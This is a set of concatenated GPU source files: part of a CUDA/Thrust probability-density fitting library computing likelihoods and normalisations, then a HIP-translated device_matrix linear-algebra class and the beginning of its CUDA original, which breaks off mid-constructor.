thrust::make_zip_iterator(thrust::make_tuple(eventIndex + thLastEntry, arrayAddress, eventSize)), *logger, dummy, cudaPlus); #pragma omp barrier if (tid == 0) { gLognorm = 0; for (j = 0; j < nthreads; j++) gLognorm += lognorms[j]; } #pragma omp barrier // std::cout << tid << ": Full NLL: " << ret << " " << gLognorm << " " << lognorm << std::endl; return gLognorm; #else thrust::counting_iterator<int> eventIndex(0); return thrust::transform_reduce(thrust::make_zip_iterator(thrust::make_tuple(eventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + numEntries, arrayAddress, eventSize)), *logger, dummy, cudaPlus); #endif } __host__ double ThrustPdfFunctor::calculateNLL () const { //if (cpuDebug & 1) std::cout << getName() << " entering calculateNLL" << std::endl; //int oldMask = cpuDebug; //if (0 == host_callnumber) setDebugMask(0, false); normalise(); //if ((0 == host_callnumber) && (1 == oldMask)) setDebugMask(1, false); /* if (cpuDebug & 1) { std::cout << "Norm factors: "; for (int i = 0; i < totalParams; ++i) std::cout << host_normalisation[i] << " "; std::cout << std::endl; } */ cudaMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, cudaMemcpyHostToDevice); cudaDeviceSynchronize(); // Ensure normalisation integrals are finished int numVars = observables.size(); if (fitControl->binnedFit()) { numVars += 2; numVars *= -1; } fptype ret = sumOfNll(numVars); if (0 == ret) abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " zero NLL", this); //if (cpuDebug & 1) std::cout << "Full NLL " << host_callnumber << " : " << 2*ret << std::endl; //setDebugMask(0); //if ((cpuDebug & 1) && (host_callnumber >= 1)) abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " debug abort", this); return 2*ret; } __host__ void ThrustPdfFunctor::evaluateAtPoints (Variable* var, std::vector<fptype>& res) { // NB: This does not project correctly in multidimensional datasets, because all observables // other than 'var' will have, for every event, whatever value they happened to get set to last // time they were set. This is likely to be the value from the last event in whatever dataset // you were fitting to, but at any rate you don't get the probability-weighted integral over // the other observables. copyParams(); normalise(); cudaMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, cudaMemcpyHostToDevice); UnbinnedDataSet tempdata(observables); double step = (var->upperlimit - var->lowerlimit) / var->numbins; for (int i = 0; i < var->numbins; ++i) { var->value = var->lowerlimit + (i+0.5)*step; tempdata.addEvent(); } setData(&tempdata); thrust::counting_iterator<int> eventIndex(0); thrust::constant_iterator<int> eventSize(observables.size()); thrust::constant_iterator<fptype*> arrayAddress(cudaDataArray); thrust::device_vector<fptype> results(var->numbins); MetricTaker evalor(this, getMetricPointer("ptr_to_Eval")); #ifdef OMP_ON unsigned int thFirstEntry, thLastEntry; int tid, nthreads; tid = omp_get_thread_num(); nthreads = omp_get_num_threads(); // use var->numbins or numEntries here? thFirstEntry = tid*(var->numbins)/nthreads; thLastEntry = (tid+1)*(var->numbins)/nthreads; thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(eventIndex+thFirstEntry, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + thLastEntry, arrayAddress, eventSize)), results.begin()+thFirstEntry, evalor); #pragma omp barrier #else thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(eventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + numEntries, arrayAddress, eventSize)), results.begin(), evalor); #endif thrust::host_vector<fptype> h_results = results; res.clear(); res.resize(var->numbins); for (int i = 0; i < var->numbins; ++i) { res[i] = h_results[i] * host_normalisation[parameters]; } } __host__ void ThrustPdfFunctor::evaluateAtPoints (std::vector<fptype>& points) const { /* std::set<Variable*> vars; getParameters(vars); unsigned int maxIndex = 0; for (std::set<Variable*>::iterator i = vars.begin(); i != vars.end(); ++i) { if ((*i)->getIndex() < maxIndex) continue; maxIndex = (*i)->getIndex(); } std::vector<double> params; params.resize(maxIndex+1); for (std::set<Variable*>::iterator i = vars.begin(); i != vars.end(); ++i) { if (0 > (*i)->getIndex()) continue; params[(*i)->getIndex()] = (*i)->value; } copyParams(params); thrust::device_vector<fptype> d_vec = points; normalise(); cudaMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, cudaMemcpyHostToDevice); thrust::transform(d_vec.begin(), d_vec.end(), d_vec.begin(), *evalor); thrust::host_vector<fptype> h_vec = d_vec; for (unsigned int i = 0; i < points.size(); ++i) points[i] = h_vec[i]; */ } __host__ void ThrustPdfFunctor::scan (Variable* var, std::vector<fptype>& values) { fptype step = var->upperlimit; step -= var->lowerlimit; step /= var->numbins; values.clear(); for (fptype v = var->lowerlimit + 0.5*step; v < var->upperlimit; v += step) { var->value = v; copyParams(); fptype curr = calculateNLL(); values.push_back(curr); } } __host__ void ThrustPdfFunctor::setParameterConstantness (bool constant) { std::set<Variable*> pars; getParameters(pars); for (std::set<Variable*>::iterator p = pars.begin(); p != pars.end(); ++p) { (*p)->fixed = constant; } } __host__ fptype ThrustPdfFunctor::getValue () { // Returns the value of the PDF at a single point. // Execute redundantly in all threads for OpenMP multiGPU case copyParams(); normalise(); cudaMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, cudaMemcpyHostToDevice); UnbinnedDataSet point(observables); point.addEvent(); setData(&point); thrust::counting_iterator<int> eventIndex(0); thrust::constant_iterator<int> eventSize(observables.size()); thrust::constant_iterator<fptype*> arrayAddress(cudaDataArray); thrust::device_vector<fptype> results(1); MetricTaker evalor(this, getMetricPointer("ptr_to_Eval")); thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(eventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + 1, arrayAddress, eventSize)), results.begin(), evalor); return results[0]; } __host__ fptype ThrustPdfFunctor::normalise () const { //if (cpuDebug & 1) std::cout << "Normalising " << getName() << " " << hasAnalyticIntegral() << " " << normRanges << std::endl; if (!fitControl->metricIsPdf()) { host_normalisation[parameters] = 1.0; return 1.0; } fptype ret = 1; if (hasAnalyticIntegral()) { for (obsConstIter v = obsCBegin(); v != obsCEnd(); ++v) { // Loop goes only over observables of this PDF. //std::cout << "Analytically integrating " << getName() << " over " << (*v)->name << std::endl; ret *= integrate((*v)->lowerlimit, (*v)->upperlimit); } host_normalisation[parameters] = 1.0/ret; //if (cpuDebug & 1) std::cout << "Analytic integral of " << getName() << " is " << ret << std::endl; return ret; } int totalBins = 1; for (obsConstIter v = obsCBegin(); v != obsCEnd(); ++v) { ret *= ((*v)->upperlimit - (*v)->lowerlimit); totalBins *= (integrationBins > 0 ? integrationBins : (*v)->numbins); //if (cpuDebug & 1) std::cout << "Total bins " << totalBins << " due to " << (*v)->name << " " << integrationBins << " " << (*v)->numbins << std::endl; } ret /= totalBins; fptype dummy = 0; static thrust::plus<fptype> cudaPlus; thrust::constant_iterator<fptype*> arrayAddress(normRanges); thrust::constant_iterator<int> eventSize(observables.size()); thrust::counting_iterator<int> binIndex(0); #ifdef OMP_ON unsigned int thFirstBin, thLastBin; int tid, nthreads; int j; tid = omp_get_thread_num(); nthreads = omp_get_num_threads(); thFirstBin = tid*(totalBins)/nthreads; thLastBin = (tid+1)*(totalBins)/nthreads; //std::cout << "totalBins = " << totalBins << " thFirstBin = " << thFirstBin << " thLastBin = " << thLastBin << std::endl; sums[tid] = thrust::transform_reduce(thrust::make_zip_iterator(thrust::make_tuple(binIndex + thFirstBin, eventSize, arrayAddress)), thrust::make_zip_iterator(thrust::make_tuple(binIndex + thLastBin, eventSize, arrayAddress)), *logger, dummy, cudaPlus); cudaThreadSynchronize(); // Ensure logger is done #pragma omp barrier if (tid == 0) { gSum = 0; for (j=0; j<nthreads; j++) gSum += sums[j]; } // std::cout << tid << ": sum = " << sum << " gSum = " << gSum << std::endl; #pragma omp barrier if (isnan(gSum)) { abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " NaN in normalisation", this); } else if (0 == gSum) { abortWithCudaPrintFlush(__FILE__, __LINE__, "Zero in normalisation", this); } ret *= gSum; #else fptype sum = thrust::transform_reduce(thrust::make_zip_iterator(thrust::make_tuple(binIndex, eventSize, arrayAddress)), thrust::make_zip_iterator(thrust::make_tuple(binIndex + totalBins, eventSize, arrayAddress)), *logger, dummy, cudaPlus); if (isnan(sum)) { abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " NaN in normalisation", this); } else if (0 == sum) { abortWithCudaPrintFlush(__FILE__, __LINE__, "Zero in normalisation", this); } //if (cpuDebug & 1) std::cout << getName() << " integral is " << ret << " " << sum << " " << (ret*sum) << " " << (1.0/(ret*sum)) << std::endl; ret *= sum; #endif if (0 == ret) abortWithCudaPrintFlush(__FILE__, __LINE__, "Zero integral"); host_normalisation[parameters] = 1.0/ret; return (fptype) ret; } // Notice that operators are distinguished by the order of the operands, // and not otherwise! It's up to the user to make his tuples correctly. // Main operator: Calls the PDF to get a predicted value, then the metric // to get the goodness-of-prediction number which is returned to MINUIT. __device__ fptype MetricTaker::operator () (thrust::tuple<int, fptype*, int> t) const { int eventIndex = thrust::get<0>(t); int eventSize = thrust::get<2>(t); fptype* eventAddress = thrust::get<1>(t) + (eventIndex * abs(eventSize)); // Causes stack size to be statically undeterminable. fptype ret = (*(reinterpret_cast<device_function_ptr>(device_function_table[functionIdx])))(eventAddress, cudaArray, paramIndices+parameters); // Notice assumption here! For unbinned fits the 'eventAddress' pointer won't be used // in the metric, so it doesn't matter what it is. For binned fits it is assumed that // the structure of the event is (obs1 obs2... binentry binvolume), so that the array // passed to the metric consists of (binentry binvolume); unless the data has // user-provided errors, in which case binvolume is replaced by binError. ret = (*(reinterpret_cast<device_metric_ptr>(device_function_table[metricIndex])))(ret, eventAddress + (abs(eventSize)-2), parameters); return ret; } // Operator for binned evaluation, no metric. // Used in normalisation. #define MAX_NUM_OBSERVABLES 5 __device__ fptype MetricTaker::operator () (thrust::tuple<int, int, fptype*> t) const { // Bin index, event size, base address [lower, upper, numbins] int evtSize = thrust::get<1>(t); assert(evtSize <= MAX_NUM_OBSERVABLES); int binNumber = thrust::get<0>(t); // Do not understand why this cannot be declared __shared__. Dynamically allocating shared memory is apparently complicated. //fptype* binCenters = (fptype*) malloc(evtSize * sizeof(fptype)); __shared__ fptype binCenters[1024*MAX_NUM_OBSERVABLES]; // To convert global bin number to (x,y,z...) coordinates: For each dimension, take the mod // with the number of bins in that dimension. Then divide by the number of bins, in effect // collapsing so the grid has one fewer dimension. Rinse and repeat. unsigned int* indices = paramIndices + parameters; for (int i = 0; i < evtSize; ++i) { fptype lowerBound = thrust::get<2>(t)[3*i+0]; fptype upperBound = thrust::get<2>(t)[3*i+1]; int numBins = (int) FLOOR(thrust::get<2>(t)[3*i+2] + 0.5); int localBin = binNumber % numBins; fptype x = upperBound - lowerBound; x /= numBins; x *= (localBin + 0.5); x += lowerBound; binCenters[indices[indices[0] + 2 + i]+threadIdx.x*MAX_NUM_OBSERVABLES] = x; binNumber /= numBins; //if (gpuDebug & 1) //if ((gpuDebug & 1) && (0 == threadIdx.x) && (0 == blockIdx.x)) //printf("[%i, %i] Bins: %i %i %i %f %f %f %f %i\n", blockIdx.x, threadIdx.x, binNumber, numBins, localBin, x, lowerBound, upperBound, thrust::get<2>(t)[3*i+2], indices[indices[0] + 2 + i]); //printf("Bins: %i %i %i %f %f\n", i, indices[indices[0] + 2 + i]+threadIdx.x*MAX_NUM_OBSERVABLES, indices[indices[0] + 2 + i], x, binCenters[threadIdx.x*MAX_NUM_OBSERVABLES]); } // Causes stack size to be statically undeterminable. fptype ret = (*(reinterpret_cast<device_function_ptr>(device_function_table[functionIdx])))(binCenters+threadIdx.x*MAX_NUM_OBSERVABLES, cudaArray, indices); //if (gpuDebug & 1) printf("[%i, %i] Binned eval: %f %f\n", blockIdx.x, threadIdx.x, binCenters[threadIdx.x*4], ret); return ret; } __host__ void ThrustPdfFunctor::getCompProbsAtDataPoints (std::vector<std::vector<fptype> >& values) { //cpuDebug = 1; copyParams(); double overall = normalise(); cudaMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, cudaMemcpyHostToDevice); //setDebugMask(1); int numVars = observables.size(); if (fitControl->binnedFit()) { numVars += 2; numVars *= -1; } thrust::device_vector<fptype> results(numEntries); thrust::constant_iterator<int> eventSize(numVars); thrust::constant_iterator<fptype*> arrayAddress(cudaDataArray); thrust::counting_iterator<int> eventIndex(0); MetricTaker evalor(this, getMetricPointer("ptr_to_Prob")); thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(eventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + numEntries, arrayAddress, eventSize)), results.begin(), evalor); //setDebugMask(0); values.clear(); values.resize(components.size() + 1); thrust::host_vector<fptype> host_results = results; //std::cout << "Overall: " << overall << " " << host_normalisation[getParameterIndex()] << " " << host_results[0] << " " << numVars << " " << numEntries << " " << host_results.size() << std::endl; for (unsigned int i = 0; i < host_results.size(); ++i) { values[0].push_back(host_results[i]); } for (unsigned int i = 0; i < components.size(); ++i) { MetricTaker compevalor(components[i], getMetricPointer("ptr_to_Prob")); thrust::counting_iterator<int> ceventIndex(0); thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(ceventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(ceventIndex + numEntries, arrayAddress, eventSize)), results.begin(), compevalor); host_results = results; //std::cout << "Normalisation " << components[i]->getName() << ": " << host_results[0] << ", " << host_normalisation[components[i]->getParameterIndex()] << std::endl; for (unsigned int j = 0; j < host_results.size(); ++j) { values[1 + i].push_back(host_results[j]); } } } // still need to add OpenMP/multi-GPU code here __host__ void ThrustPdfFunctor::transformGrid (fptype* host_output) { generateNormRange(); //normalise(); int totalBins = 1; for (obsConstIter v = obsCBegin(); v != obsCEnd(); ++v) { totalBins *= (*v)->numbins; } thrust::constant_iterator<fptype*> arrayAddress(normRanges); thrust::constant_iterator<int> eventSize(observables.size()); thrust::counting_iterator<int> binIndex(0); thrust::device_vector<fptype> d_vec; d_vec.resize(totalBins); thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(binIndex, eventSize, arrayAddress)), thrust::make_zip_iterator(thrust::make_tuple(binIndex + totalBins, eventSize, arrayAddress)), d_vec.begin(), *logger); thrust::host_vector<fptype> h_vec = d_vec; for (unsigned int i = 0; i < totalBins; ++i) host_output[i] = h_vec[i]; } MetricTaker::MetricTaker (FunctorBase* dat, void* dev_functionPtr) : metricIndex(0) , functionIdx(dat->getFunctionIndex()) , parameters(dat->getParameterIndex()) { //std::cout << "MetricTaker constructor with " << functionIdx << std::endl; #ifdef OMP_ON int tid = omp_get_thread_num(); std::map<void*, int>::iterator localPos = functionAddressToDeviceIndexMap[tid].find(dev_functionPtr); // Use find instead of [] to avoid returning 0 if the index doesn't exist. if (localPos != functionAddressToDeviceIndexMap[tid].end()) { metricIndex = (*localPos).second; } #else std::map<void*, int>::iterator localPos = functionAddressToDeviceIndexMap.find(dev_functionPtr); if (localPos != functionAddressToDeviceIndexMap.end()) { metricIndex = (*localPos).second; } #endif else { metricIndex = num_device_functions; host_function_table[num_device_functions] = dev_functionPtr; #ifdef OMP_ON functionAddressToDeviceIndexMap[tid][dev_functionPtr] = num_device_functions; #else functionAddressToDeviceIndexMap[dev_functionPtr] = num_device_functions; #endif num_device_functions++; cutilSafeCall(cudaMemcpyToSymbol(device_function_table, host_function_table, num_device_functions*sizeof(void*))); } } MetricTaker::MetricTaker (int fIdx, int pIdx) : metricIndex(0) , functionIdx(fIdx) , parameters(pIdx) { // This constructor should only be used for binned evaluation, ie for integrals. } __host__ void ThrustPdfFunctor::setFitControl (FitControl* const fc, bool takeOwnerShip) { for (unsigned int i = 0; i < components.size(); ++i) { components[i]->setFitControl(fc, false); } if ((fitControl) && (fitControl->getOwner() == this)) { delete fitControl; } fitControl = fc; if (takeOwnerShip) { fitControl->setOwner(this); } setMetrics(); } #include "FunctorBase.cu"
04df184b087f062b49c6a072109247331418ccbf.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <device_matrix.h> #include <thrust/transform_reduce.h> #include <thrust/functional.h> #include <thrust/host_vector.h> #include <thrust/device_vector.h> #define mylog(token) {std::cout << #token " = " << token << std::endl;} template <typename T> hipStream_t device_matrix<T>::_cuda_stream = 0; template <typename T> void device_matrix<T>::setCudaStream(hipStream_t& streamId) { hipblasSetStream(CUBLAS_HANDLE::getInstance(), streamId); _cuda_stream = streamId; } // =============================== // ===== class device_matrix ===== // =============================== template <typename T> __global__ void naiveMatrixTranspose(T *odata, const T *idata, const int rows, const int cols) { int x = blockIdx.x * blockDim.x + threadIdx.x; int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < cols && y < rows) { odata[x*rows + y] = idata[y*cols+ x]; } } template <typename T> device_matrix<T>::device_matrix(): _rows(0), _cols(0), _capacity(_rows * _cols), _data(NULL) { } template <typename T> device_matrix<T>::device_matrix(size_t r, size_t c): _rows(r), _cols(c), _capacity(_rows*_cols), _data(NULL) { _init(); // Be careful to comment the following line. // If the user think the default value are 0, it may give rise to creepy NaN. // fillwith(0); } template <typename T> device_matrix<T>::device_matrix(size_t r, size_t c, T value): _rows(r), _cols(c), _capacity(_rows*_cols), _data(NULL) { _init(); fillwith(value); } template <typename T> device_matrix<T>::device_matrix(T* h_data, size_t r, size_t c): _rows(r), _cols(c), _capacity(_rows*_cols), _data(NULL) { _init(); CCE(hipMemcpy(_data, h_data, sizeof(T) * _rows * _cols, hipMemcpyHostToDevice)); } template <typename T> device_matrix<T>::device_matrix(const std::string& filename): _rows(0), _cols(0), _capacity(_rows*_cols), _data(NULL) { const size_t MAX_BUFFER = 262144; char line[MAX_BUFFER]; FILE* fid = fopen(filename.c_str(), "r"); while (fgets(line, MAX_BUFFER, fid)) { _rows++; assert(line[strlen(line) - 1] == '\n'); if (_cols != 0) { continue; } char* token = strtok(line, " \n"); ++_cols; while(strtok(NULL, " \n")) { ++_cols; } } fseek(fid, 0, SEEK_SET); // BEWARE !! // BLAS stores data in column-major const char *rspecifier = (sizeof(T) / sizeof(float) == 1) ? "%f" : "%lf"; T* data = new T[_rows*_cols]; for (size_t i=0; i<_rows; ++i) for (size_t j=0; j<_cols; ++j) { fscanf(fid, rspecifier, &(data[j*_rows + i])); } fclose(fid); _init(); CCE(hipMemcpy(_data, data, sizeof(T) * _rows * _cols, hipMemcpyHostToDevice)); delete [] data; } // Copy Constructor template <typename T> device_matrix<T>::device_matrix(const device_matrix<T>& source): _rows(source._rows), _cols(source._cols), _capacity(_rows * _cols), _data(NULL) { _init(); CCE(hipMemcpy(_data, source._data, sizeof(T) * _rows * _cols, hipMemcpyDeviceToDevice)); } template <typename T> device_matrix<T>::device_matrix(const Transposed& source): _rows(source._m._cols), _cols(source._m._rows), _capacity(_rows * _cols), _data(NULL) { _init(); dim3 grid; grid.x = (unsigned int) ceil((float) _cols / 32); grid.y = (unsigned int) ceil((float) _rows / 32); dim3 threads(32, 32); hipLaunchKernelGGL(( naiveMatrixTranspose), dim3(grid), dim3(threads), 0, 0, _data, source._m._data, _rows, _cols); } #ifdef HAVE_THRUST_DEVICE_VECTOR_H // Conversion operator template <typename T> device_matrix<T>::operator thrust::device_vector<T>() const { assert(_rows == 1 || _cols == 1); return thrust::device_vector<T>(_data, _data + size()); } #endif template <typename T> device_matrix<T>::~device_matrix() { CudaMemManager<T>::free(_data); } // =========================== // ===== Other Functions ===== // =========================== // ===== Addition ===== template <typename T> device_matrix<T>& device_matrix<T>::operator += (T val) { cublas_axpy(_rows*_cols, val, SCALAR_MEMORY_BUFFER<T>::getBuffer(), 0, _data, 1); return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator + (T val) const { device_matrix<T> m(*this); return (m += val); } template <typename T> device_matrix<T>& device_matrix<T>::operator += (const device_matrix<T>& rhs) { thrust::device_ptr<T> ptr1(_data); thrust::device_ptr<T> ptr2(rhs._data); thrust::transform(ptr1, ptr1 + _rows * _cols, ptr2, ptr1, thrust::plus<T>()); return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator + (const device_matrix<T>& rhs) const { device_matrix<T> result(_rows, _cols); thrust::device_ptr<T> ptr0(result._data); thrust::device_ptr<T> ptr1(_data); thrust::device_ptr<T> ptr2(rhs._data); thrust::transform(ptr1, ptr1 + _rows * _cols, ptr2, ptr0, thrust::plus<T>()); return result; } template <typename T> device_matrix<T>& device_matrix<T>::operator += (const typename device_matrix<T>::Transposed& rhs) { *this = *this + rhs; return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator + (const typename device_matrix<T>::Transposed& rhs) const { device_matrix<T> result(_rows, _cols, 0); geam(*this, rhs._m, result, (T) 1.0, (T) 1.0, false, true); return result; } // ===== Substraction ===== template <typename T> device_matrix<T>& device_matrix<T>::operator -= (T val) { val = -val; cublas_axpy(_rows*_cols, val, SCALAR_MEMORY_BUFFER<T>::getBuffer(), 0, _data, 1); return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator - (T val) const { device_matrix<T> m(*this); return (m -= val); } template <typename T> device_matrix<T>& device_matrix<T>::operator -= (const device_matrix<T>& rhs) { thrust::device_ptr<T> ptr1(_data); thrust::device_ptr<T> ptr2(rhs._data); thrust::transform(ptr1, ptr1 + _rows * _cols, ptr2, ptr1, thrust::minus<T>()); return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator - (const device_matrix<T>& rhs) const { device_matrix<T> result(_rows, _cols); thrust::device_ptr<T> ptr0(result._data); thrust::device_ptr<T> ptr1(_data); thrust::device_ptr<T> ptr2(rhs._data); thrust::transform(ptr1, ptr1 + _rows * _cols, ptr2, ptr0, thrust::minus<T>()); return result; } template <typename T> device_matrix<T>& device_matrix<T>::operator -= (const typename device_matrix<T>::Transposed& rhs) { *this = *this - rhs; return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator - (const typename device_matrix<T>::Transposed& rhs) const { device_matrix<T> result(_rows, _cols, 0); geam(*this, rhs._m, result, (T) 1.0, (T) -1.0, false, true); return result; } // ===== Division ===== template <typename T> device_matrix<T>& device_matrix<T>::operator /= (T alpha) { return *this *= ( (T) 1 / alpha ); } template <typename T> device_matrix<T> device_matrix<T>::operator / (T alpha) const { return *this * ( (T) 1 / alpha ); } // ===== Matrix-scalar Multiplication ===== template <typename T> device_matrix<T>& device_matrix<T>::operator *= (T alpha) { if (alpha != 1) { cublas_scal(_rows*_cols, alpha, _data, 1); } return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator * (T alpha) const { device_matrix<T> result(*this); return result *= alpha; } // ===== Matrix-Matrix Multiplication ===== template <typename T> device_matrix<T>& device_matrix<T>::operator *= (const device_matrix<T>& rhs) { *this = *this * rhs; return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator * (const device_matrix<T>& rhs) const { device_matrix<T> result(_rows, rhs._cols, 0); gemm(*this, rhs, result, (T) 1.0, (T) 0.0); return result; } template <typename T> device_matrix<T>& device_matrix<T>::operator *= (const Transposed& rhs) { *this = *this * rhs; return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator * (const Transposed& rhs) const { device_matrix<T> result(_rows, rhs._m._rows, 0); gemm(*this, rhs._m, result, (T) 1.0, (T) 0.0, false, true); return result; } // Operator Assignment: // call copy constructor first, and swap with the temp variable template <typename T> device_matrix<T>& device_matrix<T>::operator = (device_matrix<T> rhs) { swap(*this, rhs); return *this; } // Operator transpose template <typename T> device_matrix<T>::Transposed device_matrix<T>::operator ~ () const { return device_matrix<T>::Transposed(*this); } template <typename T> void device_matrix<T>::_init() { _capacity = _rows * _cols; _data = CudaMemManager<T>::malloc(_rows * _cols); } template <typename T> void device_matrix<T>::resize(size_t r, size_t c) { // printf("trying to resize from (%lu, %lu) => (%lu, %lu), with original capacity = %lu\n", _rows, _cols, r, c, _capacity); if (_rows == r && _cols == c) { return; } _rows = r; _cols = c; if (r * c <= _capacity) { return; } CudaMemManager<T>::free(_data); _init(); } template <typename T> void device_matrix<T>::resize(size_t r, size_t c, T value) { this->resize(r, c); fillwith(value); } template <typename T> void device_matrix<T>::reserve(size_t capacity) { if (capacity <= _capacity) { return; } _capacity = capacity; T* buffer = CudaMemManager<T>::malloc(_capacity); CCE(hipMemcpy(buffer, _data, sizeof(T) * size(), hipMemcpyDeviceToDevice)); CudaMemManager<T>::free(_data); _data = buffer; } template <typename T> void device_matrix<T>::print(FILE* fid, int precision, char delimiter) const { if (_rows == 0 || _cols == 0) { return; } T* data = new T[size()]; CCE(hipMemcpy(data, _data, sizeof(T) * size(), hipMemcpyDeviceToHost)); char format[16]; sprintf(format, "%c%%.%de", delimiter, precision < 0 ? 0 : precision); for (size_t i=0; i<_rows; ++i) { fprintf(fid, format, data[i]); for (size_t j=1; j<_cols; ++j) { fprintf(fid, format, data[j*_rows + i]); } fprintf(fid, "\n"); } delete [] data; } template <typename T> void device_matrix<T>::fillwith(T val) { hipMemset(_data, 0, _rows * _cols * sizeof(T)); if (val != 0) { *this += val; } } template <typename T> void device_matrix<T>::save(const std::string& filename) const { FILE* fid = fopen(filename.c_str(), "w"); if (fid == NULL) { return; } print(fid); fclose(fid); } template <> void device_matrix<float>::cublas_gemm( hipblasOperation_t transA, hipblasOperation_t transB, int m, int n, int k, float alpha, const float* A, int lda, const float* B, int ldb, float beta, float* C, int ldc) { CCE(hipblasSgemm(CUBLAS_HANDLE::getInstance(), transA, transB, m, n, k, &alpha, A, lda, B, ldb, &beta, C, ldc)); } template <> void device_matrix<double>::cublas_gemm( hipblasOperation_t transA, hipblasOperation_t transB, int m, int n, int k, double alpha, const double* A, int lda, const double* B, int ldb, double beta, double* C, int ldc) { CCE(hipblasDgemm(CUBLAS_HANDLE::getInstance(), transA, transB, m, n, k, &alpha, A, lda, B, ldb, &beta, C, ldc)); } template <> void device_matrix<float>::cublas_geam( hipblasOperation_t transA, hipblasOperation_t transB, int m, int n, float alpha, const float *A, int lda, float beta , const float *B, int ldb, float *C, int ldc) { CCE(hipblasSgeam(CUBLAS_HANDLE::getInstance(), transA, transB, m, n, &alpha, A, lda, &beta, B, ldb, C, ldc)); } template <> void device_matrix<double>::cublas_geam( hipblasOperation_t transA, hipblasOperation_t transB, int m, int n, double alpha, const double *A, int lda, double beta , const double *B, int ldb, double *C, int ldc) { CCE(hipblasDgeam(CUBLAS_HANDLE::getInstance(), transA, transB, m, n, &alpha, A, lda, &beta, B, ldb, C, ldc)); } template <> void device_matrix<float>::cublas_gemv( hipblasOperation_t trans, int m, int n, float alpha, const float *A, int lda, const float *x, int incx, float beta, float *y, int incy) { CCE(hipblasSgemv(CUBLAS_HANDLE::getInstance(), trans, m, n, &alpha, A, lda, x, incx, &beta, y, incy)); } template <> void device_matrix<double>::cublas_gemv( hipblasOperation_t trans, int m, int n, double alpha, const double *A, int lda, const double *x, int incx, double beta, double *y, int incy) { CCE(hipblasDgemv(CUBLAS_HANDLE::getInstance(), trans, m, n, &alpha, A, lda, x, incx, &beta, y, incy)); } template <> void device_matrix<float>::cublas_iamax(int n, const float *x, int incx, int *result) { CCE(hipblasIsamax(CUBLAS_HANDLE::getInstance(), n, x, incx, result)); } template <> void device_matrix<double>::cublas_iamax(int n, const double *x, int incx, int *result) { CCE(hipblasIdamax(CUBLAS_HANDLE::getInstance(), n, x, incx, result)); } template <> void device_matrix<float>::cublas_nrm2(int n, const float *x, int incx, float *result) { CCE(hipblasSnrm2(CUBLAS_HANDLE::getInstance(), n, x, incx, result)); } template <> void device_matrix<double>::cublas_nrm2(int n, const double *x, int incx, double *result) { CCE(hipblasDnrm2(CUBLAS_HANDLE::getInstance(), n, x, incx, result)); } template <> void device_matrix<float>::cublas_scal(int n, float alpha, float *x, int incx) { CCE(hipblasSscal(CUBLAS_HANDLE::getInstance(), n, &alpha, x, incx)); } template <> void device_matrix<double>::cublas_scal(int n, double alpha, double *x, int incx) { CCE(hipblasDscal(CUBLAS_HANDLE::getInstance(), n, &alpha, x, incx)); } template <> void device_matrix<float>::cublas_axpy( int n, float alpha, const float *x, int incx, float *y, int incy) { CCE(hipblasSaxpy(CUBLAS_HANDLE::getInstance(), n, &alpha, x, incx, y, incy)); } template <> void device_matrix<double>::cublas_axpy( int n, double alpha, const double *x, int incx, double *y, int incy) { CCE(hipblasDaxpy(CUBLAS_HANDLE::getInstance(), n, &alpha, x, incx, y, incy)); } // ++++++++++++++++++++++++++++++++++++++++++++ // +++++ Template Explicit Initialization +++++ // ++++++++++++++++++++++++++++++++++++++++++++ template class device_matrix<float>; template class device_matrix<double>;
04df184b087f062b49c6a072109247331418ccbf.cu
#include <device_matrix.h> #include <thrust/transform_reduce.h> #include <thrust/functional.h> #include <thrust/host_vector.h> #include <thrust/device_vector.h> #define mylog(token) {std::cout << #token " = " << token << std::endl;} template <typename T> cudaStream_t device_matrix<T>::_cuda_stream = 0; template <typename T> void device_matrix<T>::setCudaStream(cudaStream_t& streamId) { cublasSetStream(CUBLAS_HANDLE::getInstance(), streamId); _cuda_stream = streamId; } // =============================== // ===== class device_matrix ===== // =============================== template <typename T> __global__ void naiveMatrixTranspose(T *odata, const T *idata, const int rows, const int cols) { int x = blockIdx.x * blockDim.x + threadIdx.x; int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < cols && y < rows) { odata[x*rows + y] = idata[y*cols+ x]; } } template <typename T> device_matrix<T>::device_matrix(): _rows(0), _cols(0), _capacity(_rows * _cols), _data(NULL) { } template <typename T> device_matrix<T>::device_matrix(size_t r, size_t c): _rows(r), _cols(c), _capacity(_rows*_cols), _data(NULL) { _init(); // Be careful to comment the following line. // If the user think the default value are 0, it may give rise to creepy NaN. // fillwith(0); } template <typename T> device_matrix<T>::device_matrix(size_t r, size_t c, T value): _rows(r), 